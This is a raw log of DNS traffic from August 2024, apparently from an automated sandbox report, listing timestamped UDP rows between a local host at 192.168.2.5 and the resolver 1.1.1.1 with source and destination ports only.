Aug 23, 2024 18:42:25.765774965 CEST	60656	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.767002106 CEST	64737	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.767193079 CEST	53	50591	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.767920017 CEST	53	62031	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.768681049 CEST	57808	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.769190073 CEST	53	64217	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.770087957 CEST	60429	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.770301104 CEST	53	54619	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.770482063 CEST	57551	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.771023035 CEST	53	52401	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.771250010 CEST	51414	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.771867037 CEST	52777	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.772799969 CEST	53	54596	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.773019075 CEST	52737	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.773823977 CEST	53	58349	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.775746107 CEST	60512	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.776587009 CEST	65147	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.776637077 CEST	53	50187	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.776732922 CEST	53	60656	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.778264999 CEST	53	64737	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.780153036 CEST	59759	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.780720949 CEST	53	57551	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.780960083 CEST	52002	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.781081915 CEST	53	51414	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.781413078 CEST	51452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.781856060 CEST	55357	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.786223888 CEST	62049	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.786559105 CEST	53	65147	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.787040949 CEST	53	60512	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.789273024 CEST	53	56714	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.791865110 CEST	53	52002	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.792860985 CEST	63793	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.792996883 CEST	53	51452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.793416023 CEST	53	52804	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.793425083 CEST	53	55357	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.793589115 CEST	63154	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.794241905 CEST	56829	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.795368910 CEST	53	50485	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.796350956 CEST	50571	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.797410965 CEST	64432	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.800116062 CEST	53	57808	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.800995111 CEST	53	61300	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.801318884 CEST	56682	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.802567959 CEST	62305	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.802580118 CEST	49380	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.802793026 CEST	56814	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.802866936 CEST	52934	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.803339958 CEST	51884	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.805000067 CEST	53	52737	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.805644035 CEST	62449	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.808006048 CEST	52755	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.808067083 CEST	53	64432	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.808214903 CEST	65426	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.808465004 CEST	53	52777	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.808969021 CEST	55989	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.809120893 CEST	57098	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.809262991 CEST	49286	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.810292006 CEST	58874	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.813160896 CEST	53	62305	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.813560963 CEST	53	49380	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.814004898 CEST	64109	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.814218044 CEST	54968	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.814363003 CEST	65117	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.814519882 CEST	60948	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.814763069 CEST	53	59759	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.815471888 CEST	53	56814	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.815675020 CEST	57373	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.815795898 CEST	56152	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.815866947 CEST	57971	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.816051960 CEST	49987	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.816205025 CEST	54990	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.816545963 CEST	60101	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.816751957 CEST	65023	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.817131996 CEST	49719	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.817142963 CEST	49552	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.817332029 CEST	50052	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.819978952 CEST	53	65426	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.820064068 CEST	53	49286	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.821494102 CEST	53	57098	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.824676991 CEST	53	54968	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.824778080 CEST	53	65117	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.825452089 CEST	53	56152	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.825491905 CEST	53	63154	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.825542927 CEST	53	54990	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.825591087 CEST	53	56829	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.826122046 CEST	53	63793	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.826560020 CEST	53	57971	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.827218056 CEST	53	49552	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.827485085 CEST	53	65023	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.830574989 CEST	53	50052	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.836255074 CEST	53	52934	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.836282969 CEST	53	51884	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.836829901 CEST	53	62449	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.840084076 CEST	53	56682	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.841394901 CEST	53	52755	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.842693090 CEST	56399	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.843419075 CEST	53	55989	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.843585014 CEST	53	58874	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.847063065 CEST	53	60948	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.847388983 CEST	53	64109	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.847697020 CEST	53	49987	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.847779989 CEST	53	57373	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.847836018 CEST	53	60101	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.849268913 CEST	53	49719	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.878618002 CEST	53	56399	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.917593002 CEST	53	51032	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.928212881 CEST	53	51714	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.931130886 CEST	53	60675	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.931683064 CEST	53	60429	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.970510006 CEST	53	62049	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:26.051321983 CEST	53	50571	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:26.381335974 CEST	53	57357	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:26.849056959 CEST	62775	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:26.893002987 CEST	53	62775	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:26.895078897 CEST	62653	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:26.953829050 CEST	60824	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:26.977746964 CEST	53	60824	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:27.206300974 CEST	53	62653	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.243261099 CEST	50872	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.243829012 CEST	50919	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.246743917 CEST	54937	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.247584105 CEST	63500	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.247940063 CEST	53062	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.248128891 CEST	52500	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.249479055 CEST	59801	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.249687910 CEST	60001	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.251071930 CEST	55520	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.251209974 CEST	63084	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.252640009 CEST	49753	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.253722906 CEST	60353	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.253905058 CEST	56401	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.255275011 CEST	55120	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.255539894 CEST	56745	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.256755114 CEST	61786	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.257002115 CEST	63793	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.257415056 CEST	53	54937	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.258116007 CEST	60859	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.258718967 CEST	50088	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.259702921 CEST	51810	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.260566950 CEST	53	59801	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.261390924 CEST	49492	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.261635065 CEST	64754	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.261670113 CEST	53	55520	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.262492895 CEST	53	49753	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.262933016 CEST	64667	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.263158083 CEST	61971	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.263942003 CEST	53329	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.263953924 CEST	53	60353	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.264735937 CEST	53	56401	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.266412020 CEST	53	55120	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.269722939 CEST	56968	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.271737099 CEST	50845	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.271955013 CEST	53	49492	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.272121906 CEST	53	64754	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.272124052 CEST	59396	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.272574902 CEST	53	61971	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.273834944 CEST	62753	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.274147034 CEST	53	64667	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.279895067 CEST	53	63500	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.279977083 CEST	53	53062	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.281131983 CEST	53	60001	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.282073975 CEST	53	59396	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.284447908 CEST	53	62753	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.285473108 CEST	53	63084	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.290354967 CEST	53	60859	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.293134928 CEST	53	50088	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.295082092 CEST	53	53329	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.295116901 CEST	65234	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.295344114 CEST	62642	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.295519114 CEST	53	56745	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.296622992 CEST	64285	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.303370953 CEST	62122	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.303953886 CEST	53	56968	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.305248022 CEST	53	62642	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.306195021 CEST	53	65234	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.306974888 CEST	53	64285	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.312021971 CEST	53701	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.312571049 CEST	49353	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.319834948 CEST	63668	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.322918892 CEST	49394	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.323077917 CEST	53	49353	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.323081970 CEST	56572	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.323215961 CEST	59725	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.324218035 CEST	57476	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.324814081 CEST	53	53701	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.333813906 CEST	53	56572	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.333986044 CEST	53	49394	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.334593058 CEST	53	57476	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.337553978 CEST	59593	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.337686062 CEST	64371	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.337872982 CEST	49411	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.340368986 CEST	52382	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.345644951 CEST	61585	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.346046925 CEST	59860	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.347157001 CEST	63114	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.347326994 CEST	51217	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.348079920 CEST	60220	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.348501921 CEST	62912	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.348511934 CEST	53	59593	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.348526955 CEST	53	64371	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.348767042 CEST	58825	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.349519968 CEST	53	49411	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.351670027 CEST	53	63668	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.351777077 CEST	53	52382	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.352559090 CEST	53	59860	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.353976011 CEST	64135	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.354177952 CEST	52332	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.354336023 CEST	57183	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.354563951 CEST	55314	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.354969978 CEST	53	59725	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.359219074 CEST	53	60220	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.363795996 CEST	53	52332	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.364069939 CEST	50671	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.364905119 CEST	51622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.366024017 CEST	50304	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.366199017 CEST	55617	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.375447989 CEST	53	50671	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.376749992 CEST	53	51622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.378315926 CEST	53	61585	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.378359079 CEST	53	63114	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.379072905 CEST	53	51217	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.380724907 CEST	53	62912	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.383450985 CEST	53	58825	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.385917902 CEST	53	64135	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.398825884 CEST	53	50304	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.413038015 CEST	60271	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.423268080 CEST	53	60271	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.426059008 CEST	54474	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.431071997 CEST	54591	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.431472063 CEST	49198	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.436628103 CEST	53	54474	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.436712980 CEST	61875	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.447778940 CEST	53	54591	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.462271929 CEST	53	49198	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.462625027 CEST	53	52500	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.467257977 CEST	53	50919	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.467896938 CEST	53	62122	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.468246937 CEST	53	61875	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.475143909 CEST	53	63793	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.485038042 CEST	53	55314	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.489335060 CEST	53	50845	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.548357010 CEST	53	57183	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.561549902 CEST	53	55617	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.781722069 CEST	55857	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:46.784091949 CEST	53	51810	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.795874119 CEST	53	55857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:46.994009972 CEST	53	61786	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:47.105501890 CEST	53	50872	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.100848913 CEST	50791	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.101772070 CEST	64622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.102726936 CEST	63105	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.103014946 CEST	61033	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.104527950 CEST	49587	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.104527950 CEST	58241	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.105776072 CEST	58673	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.105776072 CEST	59710	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.106292963 CEST	58468	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.106292963 CEST	49670	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.107280970 CEST	56579	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.107610941 CEST	56440	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.108551025 CEST	52869	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.108724117 CEST	52039	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.109986067 CEST	54192	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.109986067 CEST	57396	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.111454964 CEST	64788	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.111629963 CEST	57681	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.112584114 CEST	64665	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.112584114 CEST	55206	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.113511086 CEST	53	49587	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.113893032 CEST	54753	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.114197969 CEST	54622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.115226030 CEST	53	61033	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.115331888 CEST	53	58241	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.115365028 CEST	58669	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.116172075 CEST	53	58468	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.116199970 CEST	57867	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.118379116 CEST	53	58673	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.118613005 CEST	53	56579	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.119246006 CEST	53	49670	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.120573997 CEST	53	56440	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.121222973 CEST	53	57396	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.122220993 CEST	53	54192	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.124881029 CEST	53	54622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.125817060 CEST	53	54753	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.126312017 CEST	53	58669	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.126914024 CEST	53	64788	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.137049913 CEST	63217	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.141804934 CEST	53	52039	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.142141104 CEST	53	52869	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.143404961 CEST	53	64665	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.149189949 CEST	53	55206	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.158109903 CEST	60643	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.158668995 CEST	54428	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.158994913 CEST	54461	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.158994913 CEST	62065	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.168920040 CEST	53	60643	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.169708014 CEST	63088	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.170751095 CEST	53	63217	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.171257019 CEST	53	54428	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.172177076 CEST	64544	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.172477007 CEST	56126	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.172635078 CEST	50945	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.172991991 CEST	49657	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.172991991 CEST	56452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.173327923 CEST	50431	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.173546076 CEST	55453	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.176510096 CEST	59898	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.176760912 CEST	55380	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.177601099 CEST	58448	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.177601099 CEST	61805	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.181941032 CEST	53	55453	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.182725906 CEST	53	56126	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.184289932 CEST	53	64544	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.184307098 CEST	53	50945	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.184319019 CEST	53	63088	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.186475992 CEST	53	55380	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.187278032 CEST	53	59898	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.188328028 CEST	53	58448	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.189848900 CEST	53	54461	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.192434072 CEST	64509	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.194078922 CEST	53130	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.194344997 CEST	49898	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.194781065 CEST	62290	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.195024967 CEST	53	62065	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.203663111 CEST	53	53130	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.204747915 CEST	53	50431	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.206213951 CEST	55920	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.206494093 CEST	62809	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.206754923 CEST	50116	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.206989050 CEST	57221	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.207195044 CEST	53215	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.207349062 CEST	63429	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.207525015 CEST	62270	53	192.168.2.5	1.1.1.1
